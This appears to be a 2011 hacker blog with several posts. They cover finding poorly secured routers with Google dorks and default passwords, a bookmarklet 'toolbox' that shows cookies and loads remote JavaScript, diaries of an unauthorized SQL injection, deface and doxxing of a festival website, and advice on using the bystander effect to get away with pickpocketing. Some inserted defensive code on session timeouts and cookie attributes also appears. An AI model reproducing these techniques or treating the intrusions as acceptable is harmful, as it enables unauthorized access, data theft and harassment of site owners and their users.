| welcome to social.hackers | posts are made by Clocwork and Shadowdrifter | added some new hack diaries + podcasts |

Saturday, April 30, 2011

Router Hacking.

Today's post is on router hacking. I am not going very in-depth on how
to hack routers. I will just be going over a few ways to find unsecured and poorly configured routers.
The simplest way is to gain access to the network and go to
192.168.1.1, which is commonly the router page. You will encounter routers without passwords, but you should learn some of the most common
default passwords for routers just in case.

Common default passwords for any router username:password:


admin:admin
admin:password
admin:(no password)
(blank username and blank password)
admin:guest
guest:password

Those few password combinations will be the most commonly used. I personally used admin:admin just the other day.
Now that we have logged into the router, what can we do? Well, the first thing we can do is enable remote management (remote management is the ability to control the router from a remote location); it is different
for each router, and some do not even have the option. If you do happen to find the option, you will need to change the default
password and make sure you allow your IP address to connect. This is all very self-explanatory when you are familiar with routers.
By the end of this post you will be well on your way to becoming an expert at router configuration.

Now, it's easy to find routers just by finding secured and unsecured wireless networks to try to access. There are a lot of
routers whose web interfaces are actually indexed in Google! So with a simple Google dork we can find dozens, even hundreds, of unsecured routers
just waiting for someone to experiment with.

Google dorks to find routers:

intitle:"SpeedStream * Management Interface"      ( Speed Stream routers )

intitle:"Setup Home" "You will need * log in before * * change * settings"  ( Belkin routers )

intitle: "actiontec" main setup status " Copyright 2001 Actiontec Electronics Inc"


Those three dorks should keep you busy for quite some time. Now there is one more method that is really hit and miss.
If you happen to find a target, port scan it and look for port 23, which is Telnet by default. There are a lot of off-the-shelf routers with Telnet
active and only the default passwords in place, which are very similar to the default router passwords except for a select few.

Default Telnet router passwords:


guest:guest
guest:password
user:guest
admin:guest

That is all for now; may your blades stay sharp, your mind sharper! Shadowdrifter.

Using the Bystander Effect

The term bystander effect refers to the phenomenon in which the greater the number of people present, the less likely people are to help a person in distress.
- Darley, J. M. & Latané, B. (1969). Bystander “apathy.” American Scientist, 57, 244-268.


      The Bystander Effect, although a phenomenon, can have some practical use in Social Engineering. 


PLEASE NOTE: This effect will not happen every single time as there are good people in this world that are willing to help those in distress. We do not condone using this for illegal purposes, this post is only for information about psychological phenomenon. 

     Standard tests done by many psychologists involve the use of an injured victim lying in the middle of a busy sidewalk. Passers-by simply ignore the injured person and continue walking no matter how much the person in distress is moaning. Occasionally, someone will confront the injured victim and ask if he or she needs any assistance. The number of people that actually help is very slim when compared to the number of people that simply continue walking.


     Most psychologists say this is because people are lazy; other psychologists say that it's because no one else sees the distressed person as a priority, so it must not be that big of a deal. Others, including myself (even though I'm not a psychologist), say that they simply avoid the distressed person because they think the person could be pulling a con. However, keep all of these points in mind, as they could be useful for a Social Engineer. 


     Let's say someone gets pick-pocketed. They start to fuss, they make a big commotion, and they tell people to stop the pickpocket. Now let's say that you had a group of people just walk by the distressed person, completely ignoring him. There is a high chance that everyone else around the distressed person would do absolutely nothing simply because no one else was doing anything. 


     In theory, a group of pick-pockets could go around and steal purses, wallets, sunglasses etc. in the most non-secretive way possible and they would be able to get away with it (so long as the victim doesn't start chasing after the pick-pocket). 


     A Social Engineer can use this effect in many ways to get away with certain crimes. The biggest factor is the number of people that the Social Engineer has with him. If there's a smaller number of people, the less likely it is that he will get away with his con. The larger the number of people, the easier it will be to get away with it. 


So ask yourself, if you saw someone in distress, would you help them? What if no one else was helping them, would you still help them, or would you just walk away?


Thanks for reading,
- Clocwork

Friday, April 29, 2011

PODCAST : Episode Three - Phreaking


In this podcast we discuss different types of phreaking methods, and you get to hear a prime example of Social Engineering from Ian.

Clocwork Hack Diary : Random Mischief Part One

Posted From My Droid


I feel like I've been getting too soft lately, like I haven't done anything really mischievous. So, I've decided that I'm going to be doing random acts of mischief until I'm satisfied. Currently, I'm seated in a lawn chair on the porch of another person's house smoking a cigar and watching some birds fight over seed in a bird feeder. To make it more interesting, the person doesn't know I'm here, and I don't know the person at all. I hope they don't show up, but I need some water, and I know where to get it.



Now I'm seated in a chair at some private pool area. Just got a drink of water from the water fountain out here. Someone just yelled at me and told me to leave; I'm telling him I needed some water. Walking over to the water fountain again. Water just shot in my face, lol. Just got some water, the guy is still staring at me. About to hop the fence and continue with my running. Since today is Friday and tomorrow is Saturday (and Sunday comes afterwards, Rebecca Black reference bitches) I'll probably do some more mischief then. But I gotta get home and upload the next podcast, gotta run about 3 miles back and then I'll post it.



Thanks for reading,

-Clocwork

P.S. That guy stared at me the whole time I wrote that last message, now his kid is staring at me. Oh well, I just needed some water

Thursday, April 28, 2011

Clocwork Hack Diary : The Festival

 *Sorry for this post being a lot later than Shadow's. Been busy with some other stuff and never really got down to writing this one.*


It started off like any other normal Sunday, woke up late, did some stuff, and then sat down at my computer and got on Skype. I saw a message from Shadow talking about how he found some vulnerable website. He messaged me the website and I saw that it was vulnerable to SQLi. After a little pen-testing on the site, we saw that the only vulnerability on the site was SQLi. So, we got down to business doing some different commands (of course the site had to be v.4 right?). 

     We managed to find some tables, but unfortunately for us the tables for users and admins (if they existed) didn't have any information in them at all. I kept trying to find more and more tables and then it hit me to go ahead and try out the names of the different events (in case you couldn't tell by the title, this website was a site about a festival that happens every year, the site apparently is done by volunteers, go figure, and everyone in the festival is a volunteer). Sure enough, the names of the events gave us a lot of information: emails, addresses, and names for people in large organizations as well as the "Festival Queen" and some country music stars (yay.........).


      After extracting basically the entire database in about 10 minutes, Shadow messages me saying that the admin of the site has a vulnerable password. In fact, the password was the first name of the festival (i.e., if the festival name is Lorem Ipsum, the password was lorem). So, thanks to pure human stupidity, we were able to actually access the site.

     Shadow didn't want to deface, but I wanted to screw around as I hadn't had a successful hack in a while. So, me being me, I posted some Pedobear images in the "Kids Festival" section, and added a nice page explaining how we did what we did, or really... how Shadow did what he did. After a little more screwing around, the admin finally erased the pages, and reverted the page back to normal, and changed everyone's password. Well, the admin forgot to change his own password, so we had access to the admin panel once again. This time I decided to send messages to everyone on the staff explaining how weak the security of the website was. This was fun, but the interesting part has yet to come.

     Later on we got bored again and we created a new user on the page, gave him admin privileges, and then logged in to the site as him (because the admin finally had the sense to change the WordPress passwords, but again we still had access to the site panel, which allows us to edit all of the events). As we were on the site, the admin started to change all of the user passwords to a random string of characters and he deleted our account, but their biggest flaw was the fact that they had their logins as PHP Sessions with no timeout. So, if we wanted to, we could still be an admin today as long as we didn't log out (if the site were still up that is, the festival is over now though).

     Since we knew the admin was at his computer, we decided to call the guy up and tell him about what we had done. We told him how we got in, and how he could fix it, and I also gave him some suggestions on his PHP code (which is funny because I'm only 17 and I'm definitely not an expert at PHP). To my surprise, he was actually very grateful for the help (or so it seemed) and he even offered us a job working on the site for next year's festival. Guess good can pay off after all.

Thanks for reading, and I hope you enjoyed my first hack diary,
- Clocwork
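
The failure described in this post, logins held in sessions with no timeout so that a session outlived password changes and account deletion, is closed by checking every request against idle and absolute timeouts and against the current state of the account. The sketch below is an added example in JavaScript, not the site's PHP code and not part of the original post; the in-memory stores, function names and timeout values are assumptions, and password verification is left out.

```javascript
// Added example. In-memory Maps stand in for a database; all names are hypothetical.
const IDLE_MS = 15 * 60 * 1000;          // assumed idle timeout
const ABSOLUTE_MS = 8 * 60 * 60 * 1000;  // assumed maximum session lifetime

const users = new Map();     // username -> { credVersion }
const sessions = new Map();  // sessionId -> { user, credVersion, created, lastSeen }

function createUser(name) { users.set(name, { credVersion: 1 }); }
function changePassword(name) { users.get(name).credVersion += 1; } // orphans old sessions
function deleteUser(name) { users.delete(name); }

// A real login verifies the password and generates a random sessionId.
function login(name, sessionId, now) {
  const u = users.get(name);
  if (!u) return false;
  sessions.set(sessionId, { user: name, credVersion: u.credVersion, created: now, lastSeen: now });
  return true;
}

// Run on every request. A session that fails any check is destroyed server-side.
function validate(sessionId, now) {
  const s = sessions.get(sessionId);
  if (!s) return { ok: false, reason: 'unknown session' };
  const u = users.get(s.user);
  let reason = null;
  if (!u) reason = 'account deleted';
  else if (u.credVersion !== s.credVersion) reason = 'password changed';
  else if (now - s.created > ABSOLUTE_MS) reason = 'absolute timeout';
  else if (now - s.lastSeen > IDLE_MS) reason = 'idle timeout';
  if (reason) { sessions.delete(sessionId); return { ok: false, reason }; }
  s.lastSeen = now;
  return { ok: true, reason: null };
}

// Constructed scenario: two sessions are open when the admin resets a password
// and deletes an account. Both sessions must stop working on the next request.
function demo() {
  createUser('admin'); createUser('rogue');
  login('admin', 'sid-a', 0); login('rogue', 'sid-r', 0);
  changePassword('admin');
  deleteUser('rogue');
  return [validate('sid-a', 1000).reason, validate('sid-r', 1000).reason];
}

console.log(demo()); // [ 'password changed', 'account deleted' ]
```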

PODCAST : Episode Two - Picking Your Target



Thanks to YouTube time restrictions, we had to divide this podcast up into three segments.

In this podcast we discuss how to pick a target for hacking, and also how to defend yourself from people like us. 

Saturday, April 23, 2011

Javascript Injection Toolbox

This is for all of the skids out there that want some easy to use scripts. Recently Shadow and I have been working on new methods to hack websites. I, Clocwork, have been focusing on learning Javascript since PHP is fairly easy to understand (although it is rather tedious). Well, I came across Javascript injection a little while ago and I realized that it could essentially be a great tool for me to use later on. So, without further ado, here is my Javascript Injection Toolbox.

Requirements :
- Computer with internet access
- Some basic knowledge of Javascript

Recommended :
- Firefox Browser


What is this toolbox?
 
Basically, this toolbox is a collection of scripts that make Javascript Injection a lot easier and are stored in your browser's Bookmark Bar. 

You can easily make your own scripts if you have knowledge of the language. I threw together my "Execute Remote JS" script in about a minute with very little knowledge of the language.

How do I Make it?

     Go to your Bookmark Bar (Firefox) and right click on it. Now, select the option "New Folder." You can name this folder anything you want, I just named mine "Scripts" to save space (since my bookmark bar is actually rather full). 
     Now, right click on the Bookmark Bar again. Select the option "New Bookmark." You should see a box like this (the title will be different)

In the "Name" field, you can put whatever you like, but, the location is the important part of this tutorial.

STOP (Please Read)

In case you don't know what you're doing, these bookmarks will allow you to execute Javascript scripts in your browser. To see what I mean, copy this

javascript:alert(document.cookie);

and put it in your URL bar right now. You should see something pop up with all of your cookie information. The use of this "javascript" command allows us to execute code in our browser.
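
What that popup shows is every cookie the page's own scripts can read; a cookie set with the HttpOnly attribute never appears in document.cookie. The following added example (not part of the original post) parses Set-Cookie response headers and reports which cookies would be exposed this way and which other protective attributes are missing. The sample headers are constructed for illustration.

```javascript
// Added example: which cookies can a page script, or a bookmarklet such as
// javascript:alert(document.cookie), actually read?
function parseSetCookie(header) {
  const [first, ...attrs] = header.split(';').map(p => p.trim()).filter(Boolean);
  const eq = first.indexOf('=');
  const cookie = {
    name: eq < 0 ? '' : first.slice(0, eq),
    value: eq < 0 ? first : first.slice(eq + 1),
    httpOnly: false, secure: false, sameSite: null,
  };
  for (const attr of attrs) {
    const [key, val = ''] = attr.split('=');
    switch (key.trim().toLowerCase()) {   // attribute names are case-insensitive
      case 'httponly': cookie.httpOnly = true; break;
      case 'secure': cookie.secure = true; break;
      case 'samesite': cookie.sameSite = val.trim().toLowerCase(); break;
    }
  }
  return cookie;
}

// Names of the cookies that document.cookie would expose.
function scriptReadable(headers) {
  return headers.map(parseSetCookie).filter(c => !c.httpOnly).map(c => c.name);
}

// Per-cookie list of missing protections.
function auditCookies(headers) {
  return headers.map(parseSetCookie).map(c => {
    const issues = [];
    if (!c.httpOnly) issues.push('readable via document.cookie (no HttpOnly)');
    if (!c.secure) issues.push('also sent over plain HTTP (no Secure)');
    if (!c.sameSite) issues.push('no SameSite attribute');
    return { name: c.name, issues };
  });
}

// Constructed sample headers, as a server might send them.
const SAMPLE_HEADERS = [
  'PHPSESSID=abc123; path=/',
  'session=deadbeef; Path=/; HttpOnly; Secure; SameSite=Lax',
  'theme=dark; Path=/; Max-Age=31536000',
];

console.log(scriptReadable(SAMPLE_HEADERS)); // [ 'PHPSESSID', 'theme' ]
console.log(JSON.stringify(auditCookies(SAMPLE_HEADERS), null, 2));
```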

GO

Now, in the location field, you can put whatever script you wish to run. The idea of this toolbox is make tedious commands simple to use. For instance, if you're someone that likes to modify or spoof cookies, you would want a script that displays cookies for you (like the one I mentioned above).

Of course, these scripts can be more interactive. For instance, here's some code I created to execute remote Javascript files from a site.

javascript:function%20display(){var%20location=prompt("WHAT%20IS%20THE%20LOCATION%20OF%20THE%20FILE?","127.0.0.1");%20document.write('<script%20type="text/javascript"%20src="'%20+%20location%20+%20'"></script>');}%20display();

This way, I can modify my remote file at any time without having to change my bookmark.

Execution

To execute these commands, you simply go to your target website, click on your "Scripts" folder and select the script you wish to run. It's simple, and it takes less time than physically typing in the commands yourself. 

Conclusion

The rest of the toolbox is up to you. The first two scripts were to get you going, but you can literally put any code you like (as long as it's Javascript) in these bookmarks. Again, the idea is to use flexible scripts (ones that you can run on any website, you just click once and the code is done), or advanced scripts (which allow for more flexibility when you have more diverse sites).

So, I hope you enjoyed this idea, if someone else has had the same idea then awesome. I myself like to have things organized (even though my room is a mess) so I decided I'd go ahead and make a tutorial on this simple thing.

Thanks for reading,
- Clocwork


(check out the thread on HackForums http://www.hackforums.net/forumdisplay.php?fid=47 )

Friday, April 22, 2011

Hakipedia.

So a friend of mine showed me a "new" site, well, new to me. If you read the title you may already know of the site, but for those who did not: http://hakipedia.com/index.php/Hakipedia . It's very self-explanatory; it looks like Wikipedia, and functions like it as well. The subject is most obviously hacking and security. There are not a lot of articles yet, but I will be writing some, and as I write them I will make a post to inform you of the new page. Lately I have been a bit obsessed with wifi and War Driving. So the first article I wrote was on War Driving, which is, just to sum it up, the act of searching out wireless access points to document or use for your own needs. In case you have trouble finding the War Driving article, here ya go! http://hakipedia.com/index.php/War_Driving .

If you have any comments on it, please message me on that site; my name is Whitehaze.

Signed, Shadowdrifter.

Monday, April 18, 2011

Shadowdrifter Hack Diary : The Festival

Shadowdrifter's Hack Diary: The Festival.

I had tested dozens of sites for vulnerabilities, finding none. When I was ready to give up
I stumbled across a site that was vulnerable to SQL. When I noticed that the SQL version was 4, I was filled
with anger and hatred. After many attempts at finding the user tables I decided my time was best spent getting
my normal four hours of sleep. I sent a message to my colleague Clocwork, and took my rest.

When I awoke from my slumber I had a message which simply said "Cool". I should have known Clocwork wouldn't care about it until he had seen it for himself. When he finally joined me in my endeavours we began to test the site for other vulnerabilities; finding none, we focused solely on the SQL injection.
After many creative attempts we finally found the user table. When we inspected it further I noticed that
there was no password column. Disappointed, I continued to search through the table, only finding the usernames.

So, distraught, Clocwork and I retreated to ponder our attack. While he was working on the password
columns I decided "Hey, why not try password guessing". So I got a list of every username, and began my attack.
I tried the name of the event, and presto! I was granted super administrator access. Dumbstruck by the admin's
terrible password choice, I paused to really contemplate his ignorance. Then I messaged my colleague to tell him the good news, and we planned our next move. Our plan was to simply email the admin explaining how we got in, but I decided to go with a different plan. So we created a deface page as a proof of concept, then proceeded to dox the system admin. After finding his information we called his home, and had a good chat. Promptly he fixed the vulnerabilities, and changed the passwords to something much more difficult to guess. During our chat Clocwork and I were offered the opportunity to volunteer and do security for the festival next year. So sometimes doing a white hat hack has its benefits.

    This is all for my hacking diary... For now. May your blade stay sharp, your mind sharper.

Friday, April 8, 2011

PODCAST : Episode One - Introductions

This is the introduction podcast where we explain who we are, what we do, and what this blog will be about. We hope you enjoy this blog and these podcasts!